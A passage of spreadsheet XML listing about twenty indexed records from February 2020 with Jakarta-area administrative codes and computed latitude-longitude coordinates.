      <c r="E1364" t="s">
        <v>23</v>
      </c>
      <c r="F1364" t="s">
        <v>4924</v>
      </c>
      <c r="G1364" t="s">
        <v>4925</v>
      </c>
      <c r="H1364" t="s">
        <v>26</v>
      </c>
      <c r="I1364" t="s">
        <v>1624</v>
      </c>
      <c r="J1364" t="s">
        <v>4926</v>
      </c>
      <c r="L1364" t="s">
        <v>4927</v>
      </c>
      <c r="M1364">
        <v>3173060001</v>
      </c>
      <c r="N1364">
        <v>3173060</v>
      </c>
      <c r="O1364">
        <v>3173</v>
      </c>
      <c r="P1364">
        <v>31</v>
      </c>
      <c r="Q1364" t="s">
        <v>494</v>
      </c>
      <c r="R1364" t="s">
        <v>61</v>
      </c>
      <c r="S1364" t="s">
        <v>62</v>
      </c>
      <c r="T1364" t="s">
        <v>33</v>
      </c>
      <c r="U1364" s="5">
        <v>10685244</v>
      </c>
      <c r="V1364" s="5" t="s">
        <v>15721</v>
      </c>
      <c r="W1364" s="5">
        <v>-617203</v>
      </c>
      <c r="X1364" t="s">
        <v>19494</v>
      </c>
      <c r="Y1364" t="str">
        <f t="shared" si="21"/>
        <v>-6.17203,106.85244</v>
      </c>
    </row>
    <row r="1365" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1365">
        <v>108937</v>
      </c>
      <c r="B1365" s="1">
        <v>43885</v>
      </c>
      <c r="C1365">
        <v>1</v>
      </c>
      <c r="D1365" t="s">
        <v>22</v>
      </c>
      <c r="E1365" t="s">
        <v>23</v>
      </c>
      <c r="F1365" t="s">
        <v>4928</v>
      </c>
      <c r="G1365" t="s">
        <v>4929</v>
      </c>
      <c r="H1365" t="s">
        <v>26</v>
      </c>
      <c r="I1365" t="s">
        <v>3042</v>
      </c>
      <c r="J1365" t="s">
        <v>2043</v>
      </c>
      <c r="L1365" t="s">
        <v>4930</v>
      </c>
      <c r="M1365">
        <v>3174020005</v>
      </c>
      <c r="N1365">
        <v>3174020</v>
      </c>
      <c r="O1365">
        <v>3174</v>
      </c>
      <c r="P1365">
        <v>31</v>
      </c>
      <c r="Q1365" t="s">
        <v>30</v>
      </c>
      <c r="R1365" t="s">
        <v>31</v>
      </c>
      <c r="S1365" t="s">
        <v>32</v>
      </c>
      <c r="T1365" t="s">
        <v>33</v>
      </c>
      <c r="U1365" s="5">
        <v>10677436</v>
      </c>
      <c r="V1365" s="5" t="s">
        <v>15722</v>
      </c>
      <c r="W1365" s="5">
        <v>-617633</v>
      </c>
      <c r="X1365" t="s">
        <v>19495</v>
      </c>
      <c r="Y1365" t="str">
        <f t="shared" si="21"/>
        <v>-6.17633,106.77436</v>
      </c>
    </row>
    <row r="1366" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1366">
        <v>108938</v>
      </c>
      <c r="B1366" s="1">
        <v>43885</v>
      </c>
      <c r="C1366">
        <v>1</v>
      </c>
      <c r="D1366" t="s">
        <v>22</v>
      </c>
      <c r="E1366" t="s">
        <v>23</v>
      </c>
      <c r="F1366" s="3" t="s">
        <v>4931</v>
      </c>
      <c r="G1366" t="s">
        <v>4932</v>
      </c>
      <c r="H1366" t="s">
        <v>26</v>
      </c>
      <c r="I1366" t="s">
        <v>592</v>
      </c>
      <c r="J1366" t="s">
        <v>4933</v>
      </c>
      <c r="L1366" t="s">
        <v>4934</v>
      </c>
      <c r="M1366">
        <v>3172030006</v>
      </c>
      <c r="N1366">
        <v>3172030</v>
      </c>
      <c r="O1366">
        <v>3172</v>
      </c>
      <c r="P1366">
        <v>31</v>
      </c>
      <c r="Q1366" t="s">
        <v>462</v>
      </c>
      <c r="R1366" t="s">
        <v>228</v>
      </c>
      <c r="S1366" t="s">
        <v>49</v>
      </c>
      <c r="T1366" t="s">
        <v>33</v>
      </c>
      <c r="U1366" s="5">
        <v>10690066</v>
      </c>
      <c r="V1366" s="5" t="s">
        <v>15723</v>
      </c>
      <c r="W1366" s="5">
        <v>-631631</v>
      </c>
      <c r="X1366" t="s">
        <v>19496</v>
      </c>
      <c r="Y1366" t="str">
        <f t="shared" si="21"/>
        <v>-6.31631,106.90066</v>
      </c>
    </row>
    <row r="1367" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1367">
        <v>108939</v>
      </c>
      <c r="B1367" s="1">
        <v>43885</v>
      </c>
      <c r="C1367">
        <v>1</v>
      </c>
      <c r="D1367" t="s">
        <v>22</v>
      </c>
      <c r="E1367" t="s">
        <v>23</v>
      </c>
      <c r="F1367" t="s">
        <v>4935</v>
      </c>
      <c r="G1367" t="s">
        <v>4936</v>
      </c>
      <c r="H1367" t="s">
        <v>26</v>
      </c>
      <c r="I1367" t="s">
        <v>3652</v>
      </c>
      <c r="J1367" t="s">
        <v>4906</v>
      </c>
      <c r="L1367" t="s">
        <v>4937</v>
      </c>
      <c r="M1367">
        <v>3173010002</v>
      </c>
      <c r="N1367">
        <v>3173010</v>
      </c>
      <c r="O1367">
        <v>3173</v>
      </c>
      <c r="P1367">
        <v>31</v>
      </c>
      <c r="Q1367" t="s">
        <v>4908</v>
      </c>
      <c r="R1367" t="s">
        <v>1481</v>
      </c>
      <c r="S1367" t="s">
        <v>62</v>
      </c>
      <c r="T1367" t="s">
        <v>33</v>
      </c>
      <c r="U1367" s="5">
        <v>10681218</v>
      </c>
      <c r="V1367" s="5" t="s">
        <v>15724</v>
      </c>
      <c r="W1367" s="5">
        <v>-621163</v>
      </c>
      <c r="X1367" t="s">
        <v>19497</v>
      </c>
      <c r="Y1367" t="str">
        <f t="shared" si="21"/>
        <v>-6.21163,106.81218</v>
      </c>
    </row>
    <row r="1368" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1368">
        <v>108940</v>
      </c>
      <c r="B1368" s="1">
        <v>43885</v>
      </c>
      <c r="C1368">
        <v>1</v>
      </c>
      <c r="D1368" t="s">
        <v>22</v>
      </c>
      <c r="E1368" t="s">
        <v>23</v>
      </c>
      <c r="F1368" t="s">
        <v>4938</v>
      </c>
      <c r="G1368" t="s">
        <v>4939</v>
      </c>
      <c r="H1368" t="s">
        <v>26</v>
      </c>
      <c r="I1368" t="s">
        <v>974</v>
      </c>
      <c r="J1368" t="s">
        <v>2627</v>
      </c>
      <c r="L1368" t="s">
        <v>4940</v>
      </c>
      <c r="M1368">
        <v>3275012004</v>
      </c>
      <c r="N1368">
        <v>3275012</v>
      </c>
      <c r="O1368">
        <v>3275</v>
      </c>
      <c r="P1368">
        <v>32</v>
      </c>
      <c r="Q1368" t="s">
        <v>4941</v>
      </c>
      <c r="R1368" t="s">
        <v>4089</v>
      </c>
      <c r="S1368" t="s">
        <v>41</v>
      </c>
      <c r="T1368" t="s">
        <v>42</v>
      </c>
      <c r="U1368" s="5">
        <v>10693049</v>
      </c>
      <c r="V1368" s="5" t="s">
        <v>15725</v>
      </c>
      <c r="W1368" s="5">
        <v>-629916</v>
      </c>
      <c r="X1368" t="s">
        <v>19498</v>
      </c>
      <c r="Y1368" t="str">
        <f t="shared" si="21"/>
        <v>-6.29916,106.93049</v>
      </c>
    </row>
    <row r="1369" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1369">
        <v>108941</v>
      </c>
      <c r="B1369" s="1">
        <v>43885</v>
      </c>
      <c r="C1369">
        <v>1</v>
      </c>
      <c r="D1369" t="s">
        <v>22</v>
      </c>
      <c r="E1369" t="s">
        <v>23</v>
      </c>
      <c r="F1369" t="s">
        <v>4942</v>
      </c>
      <c r="G1369" t="s">
        <v>4943</v>
      </c>
      <c r="H1369" t="s">
        <v>26</v>
      </c>
      <c r="I1369" t="s">
        <v>1651</v>
      </c>
      <c r="J1369" t="s">
        <v>4944</v>
      </c>
      <c r="L1369" t="s">
        <v>4945</v>
      </c>
      <c r="M1369">
        <v>3175020002</v>
      </c>
      <c r="N1369">
        <v>3175020</v>
      </c>
      <c r="O1369">
        <v>3175</v>
      </c>
      <c r="P1369">
        <v>31</v>
      </c>
      <c r="Q1369" t="s">
        <v>4760</v>
      </c>
      <c r="R1369" t="s">
        <v>2228</v>
      </c>
      <c r="S1369" t="s">
        <v>547</v>
      </c>
      <c r="T1369" t="s">
        <v>33</v>
      </c>
      <c r="U1369" s="5">
        <v>10684439</v>
      </c>
      <c r="V1369" s="5" t="s">
        <v>15726</v>
      </c>
      <c r="W1369" s="5">
        <v>-612978</v>
      </c>
      <c r="X1369" t="s">
        <v>19499</v>
      </c>
      <c r="Y1369" t="str">
        <f t="shared" si="21"/>
        <v>-6.12978,106.84439</v>
      </c>
    </row>
    <row r="1370" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1370">
        <v>108942</v>
      </c>
      <c r="B1370" s="1">
        <v>43885</v>
      </c>
      <c r="C1370">
        <v>1</v>
      </c>
      <c r="D1370" t="s">
        <v>22</v>
      </c>
      <c r="E1370" t="s">
        <v>23</v>
      </c>
      <c r="F1370" t="s">
        <v>4946</v>
      </c>
      <c r="G1370" t="s">
        <v>4947</v>
      </c>
      <c r="H1370" t="s">
        <v>26</v>
      </c>
      <c r="I1370" t="s">
        <v>197</v>
      </c>
      <c r="J1370" t="s">
        <v>2627</v>
      </c>
      <c r="M1370">
        <v>3275060008</v>
      </c>
      <c r="N1370">
        <v>3275060</v>
      </c>
      <c r="O1370">
        <v>3275</v>
      </c>
      <c r="P1370">
        <v>32</v>
      </c>
      <c r="Q1370" t="s">
        <v>2473</v>
      </c>
      <c r="R1370" t="s">
        <v>114</v>
      </c>
      <c r="S1370" t="s">
        <v>41</v>
      </c>
      <c r="T1370" t="s">
        <v>42</v>
      </c>
      <c r="U1370" s="5">
        <v>10697007</v>
      </c>
      <c r="V1370" s="5" t="s">
        <v>15727</v>
      </c>
      <c r="W1370" s="5">
        <v>-624438</v>
      </c>
      <c r="X1370" t="s">
        <v>19500</v>
      </c>
      <c r="Y1370" t="str">
        <f t="shared" si="21"/>
        <v>-6.24438,106.97007</v>
      </c>
    </row>
    <row r="1371" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1371">
        <v>108943</v>
      </c>
      <c r="B1371" s="1">
        <v>43885</v>
      </c>
      <c r="C1371">
        <v>1</v>
      </c>
      <c r="D1371" t="s">
        <v>22</v>
      </c>
      <c r="E1371" t="s">
        <v>23</v>
      </c>
      <c r="F1371" t="s">
        <v>4948</v>
      </c>
      <c r="G1371" t="s">
        <v>4949</v>
      </c>
      <c r="H1371" t="s">
        <v>26</v>
      </c>
      <c r="I1371" t="s">
        <v>1364</v>
      </c>
      <c r="J1371" t="s">
        <v>4950</v>
      </c>
      <c r="L1371" t="s">
        <v>4951</v>
      </c>
      <c r="M1371">
        <v>3172070003</v>
      </c>
      <c r="N1371">
        <v>3172070</v>
      </c>
      <c r="O1371">
        <v>3172</v>
      </c>
      <c r="P1371">
        <v>31</v>
      </c>
      <c r="Q1371" t="s">
        <v>2659</v>
      </c>
      <c r="R1371" t="s">
        <v>128</v>
      </c>
      <c r="S1371" t="s">
        <v>49</v>
      </c>
      <c r="T1371" t="s">
        <v>33</v>
      </c>
      <c r="U1371" s="5">
        <v>10693110</v>
      </c>
      <c r="V1371" s="5" t="s">
        <v>15728</v>
      </c>
      <c r="W1371" s="5">
        <v>-624023</v>
      </c>
      <c r="X1371" t="s">
        <v>18298</v>
      </c>
      <c r="Y1371" t="str">
        <f t="shared" si="21"/>
        <v>-6.24023,106.93110</v>
      </c>
    </row>
    <row r="1372" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1372">
        <v>108944</v>
      </c>
      <c r="B1372" s="1">
        <v>43885</v>
      </c>
      <c r="C1372">
        <v>1</v>
      </c>
      <c r="D1372" t="s">
        <v>22</v>
      </c>
      <c r="E1372" t="s">
        <v>23</v>
      </c>
      <c r="F1372" t="s">
        <v>4952</v>
      </c>
      <c r="G1372" t="s">
        <v>4953</v>
      </c>
      <c r="H1372" t="s">
        <v>26</v>
      </c>
      <c r="I1372" t="s">
        <v>1538</v>
      </c>
      <c r="J1372" t="s">
        <v>2627</v>
      </c>
      <c r="L1372" t="s">
        <v>4954</v>
      </c>
      <c r="M1372">
        <v>3275050003</v>
      </c>
      <c r="N1372">
        <v>3275050</v>
      </c>
      <c r="O1372">
        <v>3275</v>
      </c>
      <c r="P1372">
        <v>32</v>
      </c>
      <c r="Q1372" t="s">
        <v>2310</v>
      </c>
      <c r="R1372" t="s">
        <v>955</v>
      </c>
      <c r="S1372" t="s">
        <v>41</v>
      </c>
      <c r="T1372" t="s">
        <v>42</v>
      </c>
      <c r="U1372" s="5">
        <v>10697226</v>
      </c>
      <c r="V1372" s="5" t="s">
        <v>15729</v>
      </c>
      <c r="W1372" s="5">
        <v>-626519</v>
      </c>
      <c r="X1372" t="s">
        <v>19501</v>
      </c>
      <c r="Y1372" t="str">
        <f t="shared" si="21"/>
        <v>-6.26519,106.97226</v>
      </c>
    </row>
    <row r="1373" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1373">
        <v>108945</v>
      </c>
      <c r="B1373" s="1">
        <v>43885</v>
      </c>
      <c r="C1373">
        <v>1</v>
      </c>
      <c r="D1373" t="s">
        <v>22</v>
      </c>
      <c r="E1373" t="s">
        <v>23</v>
      </c>
      <c r="F1373" t="s">
        <v>4955</v>
      </c>
      <c r="G1373" t="s">
        <v>4956</v>
      </c>
      <c r="H1373" t="s">
        <v>26</v>
      </c>
      <c r="I1373" t="s">
        <v>72</v>
      </c>
      <c r="J1373" t="s">
        <v>4957</v>
      </c>
      <c r="L1373" t="s">
        <v>4958</v>
      </c>
      <c r="M1373">
        <v>3174050005</v>
      </c>
      <c r="N1373">
        <v>3174050</v>
      </c>
      <c r="O1373">
        <v>3174</v>
      </c>
      <c r="P1373">
        <v>31</v>
      </c>
      <c r="Q1373" t="s">
        <v>4959</v>
      </c>
      <c r="R1373" t="s">
        <v>2826</v>
      </c>
      <c r="S1373" t="s">
        <v>32</v>
      </c>
      <c r="T1373" t="s">
        <v>33</v>
      </c>
      <c r="U1373" s="5">
        <v>10680371</v>
      </c>
      <c r="V1373" s="5" t="s">
        <v>15730</v>
      </c>
      <c r="W1373" s="5">
        <v>-614867</v>
      </c>
      <c r="X1373" t="s">
        <v>19502</v>
      </c>
      <c r="Y1373" t="str">
        <f t="shared" si="21"/>
        <v>-6.14867,106.80371</v>
      </c>
    </row>
    <row r="1374" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1374">
        <v>108946</v>
      </c>
      <c r="B1374" s="1">
        <v>43885</v>
      </c>
      <c r="C1374">
        <v>1</v>
      </c>
      <c r="D1374" t="s">
        <v>22</v>
      </c>
      <c r="E1374" t="s">
        <v>23</v>
      </c>
      <c r="F1374" t="s">
        <v>4960</v>
      </c>
      <c r="G1374" t="s">
        <v>4961</v>
      </c>
      <c r="H1374" t="s">
        <v>26</v>
      </c>
      <c r="I1374" t="s">
        <v>592</v>
      </c>
      <c r="J1374" t="s">
        <v>2627</v>
      </c>
      <c r="L1374" t="s">
        <v>4962</v>
      </c>
      <c r="M1374">
        <v>3275061004</v>
      </c>
      <c r="N1374">
        <v>3275061</v>
      </c>
      <c r="O1374">
        <v>3275</v>
      </c>
      <c r="P1374">
        <v>32</v>
      </c>
      <c r="Q1374" t="s">
        <v>39</v>
      </c>
      <c r="R1374" t="s">
        <v>40</v>
      </c>
      <c r="S1374" t="s">
        <v>41</v>
      </c>
      <c r="T1374" t="s">
        <v>42</v>
      </c>
      <c r="U1374" s="5">
        <v>10699299</v>
      </c>
      <c r="V1374" s="5" t="s">
        <v>15731</v>
      </c>
      <c r="W1374" s="5">
        <v>-618697</v>
      </c>
      <c r="X1374" t="s">
        <v>19503</v>
      </c>
      <c r="Y1374" t="str">
        <f t="shared" si="21"/>
        <v>-6.18697,106.99299</v>
      </c>
    </row>
    <row r="1375" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1375">
        <v>108947</v>
      </c>
      <c r="B1375" s="1">
        <v>43885</v>
      </c>
      <c r="C1375">
        <v>1</v>
      </c>
      <c r="D1375" t="s">
        <v>22</v>
      </c>
      <c r="E1375" t="s">
        <v>23</v>
      </c>
      <c r="F1375" t="s">
        <v>4963</v>
      </c>
      <c r="H1375" t="s">
        <v>26</v>
      </c>
      <c r="I1375" t="s">
        <v>27</v>
      </c>
      <c r="J1375" t="s">
        <v>3066</v>
      </c>
      <c r="L1375" t="s">
        <v>347</v>
      </c>
      <c r="M1375">
        <v>3173020001</v>
      </c>
      <c r="N1375">
        <v>3173020</v>
      </c>
      <c r="O1375">
        <v>3173</v>
      </c>
      <c r="P1375">
        <v>31</v>
      </c>
      <c r="Q1375" t="s">
        <v>179</v>
      </c>
      <c r="R1375" t="s">
        <v>179</v>
      </c>
      <c r="S1375" t="s">
        <v>62</v>
      </c>
      <c r="T1375" t="s">
        <v>33</v>
      </c>
      <c r="U1375" s="5">
        <v>10683408</v>
      </c>
      <c r="V1375" s="5" t="s">
        <v>15222</v>
      </c>
      <c r="W1375" s="5">
        <v>-619876</v>
      </c>
      <c r="X1375" t="s">
        <v>19012</v>
      </c>
      <c r="Y1375" t="str">
        <f t="shared" si="21"/>
        <v>-6.19876,106.83408</v>
      </c>
    </row>
    <row r="1376" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1376">
        <v>108948</v>
      </c>
      <c r="B1376" s="1">
        <v>43885</v>
      </c>
      <c r="C1376">
        <v>1</v>
      </c>
      <c r="D1376" t="s">
        <v>22</v>
      </c>
      <c r="E1376" t="s">
        <v>23</v>
      </c>
      <c r="F1376" t="s">
        <v>4964</v>
      </c>
      <c r="G1376" t="s">
        <v>4965</v>
      </c>
      <c r="H1376" t="s">
        <v>26</v>
      </c>
      <c r="I1376" t="s">
        <v>166</v>
      </c>
      <c r="J1376" t="s">
        <v>4966</v>
      </c>
      <c r="L1376" t="s">
        <v>4967</v>
      </c>
      <c r="M1376">
        <v>3175060006</v>
      </c>
      <c r="N1376">
        <v>3175060</v>
      </c>
      <c r="O1376">
        <v>3175</v>
      </c>
      <c r="P1376">
        <v>31</v>
      </c>
      <c r="Q1376" t="s">
        <v>2409</v>
      </c>
      <c r="R1376" t="s">
        <v>2279</v>
      </c>
      <c r="S1376" t="s">
        <v>547</v>
      </c>
      <c r="T1376" t="s">
        <v>33</v>
      </c>
      <c r="U1376" s="5">
        <v>10692450</v>
      </c>
      <c r="V1376" s="5" t="s">
        <v>15732</v>
      </c>
      <c r="W1376" s="5">
        <v>-613238</v>
      </c>
      <c r="X1376" t="s">
        <v>19504</v>
      </c>
      <c r="Y1376" t="str">
        <f t="shared" si="21"/>
        <v>-6.13238,106.92450</v>
      </c>
    </row>
    <row r="1377" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1377">
        <v>108949</v>
      </c>
      <c r="B1377" s="1">
        <v>43885</v>
      </c>
      <c r="C1377">
        <v>1</v>
      </c>
      <c r="D1377" t="s">
        <v>22</v>
      </c>
      <c r="E1377" t="s">
        <v>23</v>
      </c>
      <c r="F1377" t="s">
        <v>4968</v>
      </c>
      <c r="G1377" t="s">
        <v>4969</v>
      </c>
      <c r="H1377" t="s">
        <v>26</v>
      </c>
      <c r="I1377" t="s">
        <v>197</v>
      </c>
      <c r="J1377" t="s">
        <v>2627</v>
      </c>
      <c r="L1377" t="s">
        <v>4970</v>
      </c>
      <c r="M1377">
        <v>3275040008</v>
      </c>
      <c r="N1377">
        <v>3275040</v>
      </c>
      <c r="O1377">
        <v>3275</v>
      </c>
      <c r="P1377">
        <v>32</v>
      </c>
      <c r="Q1377" t="s">
        <v>2814</v>
      </c>
      <c r="R1377" t="s">
        <v>100</v>
      </c>
      <c r="S1377" t="s">
        <v>41</v>
      </c>
      <c r="T1377" t="s">
        <v>42</v>
      </c>
      <c r="U1377" s="5">
        <v>10704167</v>
      </c>
      <c r="V1377" s="5" t="s">
        <v>15733</v>
      </c>
      <c r="W1377" s="5">
        <v>-624162</v>
      </c>
      <c r="X1377" t="s">
        <v>19505</v>
      </c>
      <c r="Y1377" t="str">
        <f t="shared" si="21"/>
        <v>-6.24162,107.04167</v>
      </c>
    </row>
    <row r="1378" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1378">
        <v>108950</v>
      </c>
      <c r="B1378" s="1">
        <v>43885</v>
      </c>
      <c r="C1378">
        <v>1</v>
      </c>
      <c r="D1378" t="s">
        <v>22</v>
      </c>
      <c r="E1378" t="s">
        <v>23</v>
      </c>
      <c r="F1378" t="s">
        <v>4971</v>
      </c>
      <c r="G1378" t="s">
        <v>4972</v>
      </c>
      <c r="H1378" t="s">
        <v>26</v>
      </c>
      <c r="I1378" t="s">
        <v>1194</v>
      </c>
      <c r="J1378" t="s">
        <v>4973</v>
      </c>
      <c r="L1378" t="s">
        <v>4974</v>
      </c>
      <c r="M1378">
        <v>3175050002</v>
      </c>
      <c r="N1378">
        <v>3175050</v>
      </c>
      <c r="O1378">
        <v>3175</v>
      </c>
      <c r="P1378">
        <v>31</v>
      </c>
      <c r="Q1378" t="s">
        <v>1012</v>
      </c>
      <c r="R1378" t="s">
        <v>1013</v>
      </c>
      <c r="S1378" t="s">
        <v>547</v>
      </c>
      <c r="T1378" t="s">
        <v>33</v>
      </c>
      <c r="U1378" s="5">
        <v>10689682</v>
      </c>
      <c r="V1378" s="5" t="s">
        <v>15734</v>
      </c>
      <c r="W1378" s="5">
        <v>-617119</v>
      </c>
      <c r="X1378" t="s">
        <v>19506</v>
      </c>
      <c r="Y1378" t="str">
        <f t="shared" si="21"/>
        <v>-6.17119,106.89682</v>
      </c>
    </row>
    <row r="1379" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1379">
        <v>108951</v>
      </c>
      <c r="B1379" s="1">
        <v>43885</v>
      </c>
      <c r="C1379">
        <v>1</v>
      </c>
      <c r="D1379" t="s">
        <v>22</v>
      </c>
      <c r="E1379" t="s">
        <v>23</v>
      </c>
      <c r="F1379" t="s">
        <v>4975</v>
      </c>
      <c r="G1379" t="s">
        <v>4976</v>
      </c>
      <c r="H1379" t="s">
        <v>26</v>
      </c>
      <c r="I1379" t="s">
        <v>882</v>
      </c>
      <c r="J1379" t="s">
        <v>2627</v>
      </c>
      <c r="L1379" t="s">
        <v>4977</v>
      </c>
      <c r="M1379">
        <v>3275061001</v>
      </c>
      <c r="N1379">
        <v>3275061</v>
      </c>
      <c r="O1379">
        <v>3275</v>
      </c>
      <c r="P1379">
        <v>32</v>
      </c>
      <c r="Q1379" t="s">
        <v>494</v>
      </c>
      <c r="R1379" t="s">
        <v>40</v>
      </c>
      <c r="S1379" t="s">
        <v>41</v>
      </c>
      <c r="T1379" t="s">
        <v>42</v>
      </c>
      <c r="U1379" s="5">
        <v>10698812</v>
      </c>
      <c r="V1379" s="5" t="s">
        <v>15735</v>
      </c>
      <c r="W1379" s="5">
        <v>-622364</v>
      </c>
      <c r="X1379" t="s">
        <v>19507</v>
      </c>
      <c r="Y1379" t="str">
        <f t="shared" si="21"/>
        <v>-6.22364,106.98812</v>
      </c>
    </row>
    <row r="1380" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1380">
        <v>108955</v>
      </c>
      <c r="B1380" s="1">
        <v>43885</v>
      </c>
      <c r="C1380">
        <v>1</v>
      </c>
      <c r="D1380" t="s">
        <v>22</v>
      </c>
      <c r="E1380" t="s">
        <v>23</v>
      </c>
      <c r="F1380" t="s">
        <v>4978</v>
      </c>
      <c r="G1380" t="s">
        <v>4979</v>
      </c>
      <c r="H1380" t="s">
        <v>26</v>
      </c>
      <c r="I1380" t="s">
        <v>3275</v>
      </c>
      <c r="J1380" t="s">
        <v>2627</v>
      </c>
      <c r="L1380" t="s">
        <v>4980</v>
      </c>
      <c r="M1380">
        <v>3275050003</v>
      </c>
      <c r="N1380">
        <v>3275050</v>
      </c>
      <c r="O1380">
        <v>3275</v>
      </c>
      <c r="P1380">
        <v>32</v>
      </c>
      <c r="Q1380" t="s">
        <v>2310</v>
      </c>
      <c r="R1380" t="s">
        <v>955</v>
      </c>
      <c r="S1380" t="s">
        <v>41</v>
      </c>
      <c r="T1380" t="s">
        <v>42</v>
      </c>
      <c r="U1380" s="5">
        <v>10697293</v>
      </c>
      <c r="V1380" s="5" t="s">
        <v>15736</v>
      </c>
      <c r="W1380" s="5">
        <v>-626334</v>
      </c>
      <c r="X1380" t="s">
        <v>19508</v>
      </c>
      <c r="Y1380" t="str">
        <f t="shared" si="21"/>
        <v>-6.26334,106.97293</v>
      </c>
    </row>
    <row r="1381" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1381">
        <v>110383</v>
      </c>
      <c r="B1381" s="1">
        <v>43885</v>
      </c>
      <c r="C1381">
        <v>1</v>
      </c>
      <c r="D1381" t="s">
        <v>2648</v>
      </c>
      <c r="E1381" t="s">
        <v>23</v>
      </c>
      <c r="G1381" t="s">
        <v>2808</v>
      </c>
      <c r="H1381" t="s">
        <v>26</v>
      </c>
      <c r="J1381" t="s">
        <v>478</v>
      </c>
      <c r="L1381" t="s">
        <v>2809</v>
      </c>
      <c r="M1381">
        <v>3174070001</v>
      </c>
      <c r="N1381">
        <v>3174070</v>
      </c>
      <c r="O1381">
        <v>3174</v>
      </c>
      <c r="P1381">
        <v>31</v>
      </c>
      <c r="Q1381" t="s">
        <v>83</v>
      </c>
      <c r="R1381" t="s">
        <v>84</v>
      </c>
      <c r="S1381" t="s">
        <v>32</v>
      </c>
      <c r="T1381" t="s">
        <v>33</v>
      </c>
      <c r="U1381" s="5">
        <v>10671908</v>
      </c>
      <c r="V1381" s="5" t="s">
        <v>15082</v>
      </c>
      <c r="W1381" s="5">
        <v>-616426</v>
      </c>
      <c r="X1381" t="s">
        <v>18888</v>
      </c>
      <c r="Y1381" t="str">
        <f t="shared" si="21"/>
        <v>-6.16426,106.71908</v>
      </c>
    </row>
    <row r="1382" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1382">
        <v>110385</v>
      </c>
      <c r="B1382" s="1">
        <v>43885</v>
      </c>
      <c r="C1382">
        <v>1</v>
      </c>
      <c r="D1382" t="s">
        <v>2648</v>
      </c>
      <c r="E1382" t="s">
        <v>23</v>
      </c>
      <c r="G1382" t="s">
        <v>2795</v>
      </c>
      <c r="H1382" t="s">
        <v>26</v>
      </c>
      <c r="J1382" t="s">
        <v>374</v>
      </c>
      <c r="L1382" t="s">
        <v>2796</v>
      </c>
      <c r="M1382">
        <v>3174040005</v>
      </c>
      <c r="N1382">
        <v>3174040</v>
      </c>
      <c r="O1382">
        <v>3174</v>
      </c>
      <c r="P1382">
        <v>31</v>
      </c>
      <c r="Q1382" t="s">
        <v>376</v>
      </c>
      <c r="R1382" t="s">
        <v>377</v>
      </c>
      <c r="S1382" t="s">
        <v>32</v>
      </c>
      <c r="T1382" t="s">
        <v>33</v>
      </c>
      <c r="U1382" s="5">
        <v>10678812</v>
      </c>
      <c r="V1382" s="5" t="s">
        <v>15078</v>
      </c>
      <c r="W1382" s="5">
        <v>-616399</v>
      </c>
      <c r="X1382" t="s">
        <v>18884</v>
      </c>
      <c r="Y1382" t="str">
        <f t="shared" si="21"/>
        <v>-6.16399,106.78812</v>
      </c>
    </row>
    <row r="1383" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1383">
        <v>110387</v>
      </c>
      <c r="B1383" s="1">
        <v>43885</v>
      </c>
      <c r="C1383">
        <v>1</v>
      </c>
      <c r="D1383" t="s">
        <v>2648</v>
      </c>
      <c r="E1383" t="s">
        <v>23</v>
      </c>
      <c r="G1383" t="s">
        <v>2815</v>
      </c>
      <c r="H1383" t="s">
        <v>26</v>
      </c>
      <c r="J1383" t="s">
        <v>2816</v>
      </c>
      <c r="L1383" t="s">
        <v>2817</v>
      </c>
      <c r="M1383">
        <v>3172020002</v>
      </c>
      <c r="N1383">
        <v>3172020</v>
      </c>
      <c r="O1383">
        <v>3172</v>
      </c>
      <c r="P1383">
        <v>31</v>
      </c>
      <c r="Q1383" t="s">
        <v>2818</v>
      </c>
      <c r="R1383" t="s">
        <v>1644</v>
      </c>
      <c r="S1383" t="s">
        <v>49</v>
      </c>
      <c r="T1383" t="s">
        <v>33</v>
      </c>
      <c r="U1383" s="5">
        <v>10688143</v>
      </c>
      <c r="V1383" s="5" t="s">
        <v>15085</v>
      </c>
      <c r="W1383" s="5">
        <v>-632805</v>
      </c>
      <c r="X1383" t="s">
        <v>18891</v>
      </c>
      <c r="Y1383" t="str">
        <f t="shared" si="21"/>
        <v>-6.32805,106.88143</v>
      </c>
    </row>
    <row r="1384" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1384">
        <v>110388</v>
      </c>
      <c r="B1384" s="1">
        <v>43885</v>
      </c>
      <c r="C1384">
        <v>1</v>
      </c>
      <c r="D1384" t="s">
        <v>2648</v>
      </c>
      <c r="E1384" t="s">
        <v>23</v>
      </c>
      <c r="G1384" t="s">
        <v>2791</v>
      </c>
      <c r="H1384" t="s">
        <v>26</v>
      </c>
      <c r="J1384" t="s">
        <v>478</v>
      </c>
      <c r="L1384" t="s">
        <v>2792</v>
      </c>
      <c r="M1384">
        <v>3174070001</v>
      </c>
      <c r="N1384">
        <v>3174070</v>
      </c>
      <c r="O1384">
        <v>3174</v>
      </c>
      <c r="P1384">
        <v>31</v>
      </c>
      <c r="Q1384" t="s">
        <v>83</v>
      </c>
      <c r="R1384" t="s">
        <v>84</v>
      </c>
      <c r="S1384" t="s">
        <v>32</v>
      </c>
      <c r="T1384" t="s">
        <v>33</v>
      </c>
      <c r="U1384" s="5">
        <v>10671766</v>
      </c>
      <c r="V1384" s="5" t="s">
        <v>15077</v>
      </c>
      <c r="W1384" s="5">
        <v>-616505</v>
      </c>
      <c r="X1384" t="s">
        <v>18883</v>
      </c>
      <c r="Y1384" t="str">
        <f t="shared" si="21"/>
        <v>-6.16505,106.71766</v>
      </c>
    </row>
